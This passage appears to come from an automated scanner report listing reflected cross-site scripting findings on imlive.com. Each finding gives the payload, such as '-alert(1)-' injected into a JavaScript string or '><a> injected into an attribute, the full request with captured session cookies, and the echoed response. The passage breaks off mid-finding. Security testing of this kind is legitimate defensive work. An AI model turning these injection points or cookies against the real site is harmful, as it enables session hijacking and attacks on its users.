Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 16143
Vary: Accept-Encoding


<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp?1a452'><a>a6955adbf25=1&lr=1107816009&ud=0&pe=minglesingles.asp&qs=1a452'>
...[SNIP]...

4.555. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /pr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90148'><a>2e9c3e6d159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /pr.asp?90148'><a>2e9c3e6d159=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:18 GMT
Connection: close
Content-Length: 9886
Vary: Accept-Encoding


<!--include file="help/CustomerServiceEmails.inc"-->

<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/pr.asp?90148'><a>2e9c3e6d159=1&lr=1107816009&ud=0&pe=pr.asp&qs=90148'>
...[SNIP]...

4.556. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf17'-alert(1)-'f7758fd0154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.asp?1cf17'-alert(1)-'f7758fd0154=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:57 GMT
Connection: close
Content-Length: 19576
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.557. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad584"><a>5bd7ab7e3b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /preparesearch.asp?ad584"><a>5bd7ab7e3b0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:33 GMT
Connection: close
Content-Length: 19415
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?ad584"><a>5bd7ab7e3b0=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.558. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed33"><a>4a10453e31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /preparesearch.aspx?aed33"><a>4a10453e31b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 19417
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?aed33"><a>4a10453e31b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.559. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac9b'-alert(1)-'0d66f31204c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 19578
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.560. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1979b'><a>18155b4088b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap.html?1979b'><a>18155b4088b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:32 GMT
Connection: close
Content-Length: 33756
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html?1979b'><a>18155b4088b=1&lr=1107816008&ud=0&pe=sitemap.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.561. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /videosfr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f44ce'><a>23f9fd95641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videosfr.asp?f44ce'><a>23f9fd95641=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:13 GMT
Connection: close
Content-Length: 15757
Vary: Accept-Encoding


<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp?f44ce'><a>23f9fd95641=1&lr=1107816009&ud=0&pe=videosfr.asp&qs=f44ce'>
...[SNIP]...

4.562. http://imlive.com/warningjx.aspx [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /warningjx.aspx

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a49'-alert(1)-'2edefc94fdc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /warningjx.aspx?redirect=/e2a49'-alert(1)-'2edefc94fdc HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 2375
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fe2a49'-alert(1)-'2edefc94fdc'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

4.563. http://imlive.com/warningms.asp [ms parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5576b'><a>7cdefc4b49a was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms5576b'><a>7cdefc4b49a HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
